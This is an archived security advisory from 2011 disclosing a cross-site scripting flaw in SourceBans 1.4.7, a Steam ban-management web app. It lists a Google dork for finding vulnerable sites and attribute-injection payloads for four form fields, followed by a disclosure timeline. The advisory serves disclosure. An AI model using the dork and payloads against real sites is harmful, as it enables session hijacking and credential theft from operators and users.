[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SourceBans Version 1.4.7 XSS
# Exploit Title: SourceBans Version 1.4.7 XSS
# Google Dork: inurl:"sourcebans/index.php?p=submit"
# Date: Feb. 9th 2011
# Author: Sw1tCh
# Software Link: http://www.sourcebans.net/
# Version: 1.4.7
SourceBans is an application for managing publicly the banned users for a Steam Server.
#-= The Advisory =-
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.
#-= Example =-
- > BanIP => " onmouseover=prompt(928137) bad="
- > Comments => " onmouseover=prompt(928137) bad="
- > Name => " onmouseover=prompt(928137) bad="
- > Email => " onmouseover=prompt(928137) bad="
- Vulnerability found and researched: January 18th 2011
- Vendor (SourceBans) contacted: January 18th 2011
[ Time Reduced because Ops of IRC channel were dicks ]
- Disclosed to Exploit-DB, Bugtraq and InterN0T:
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3,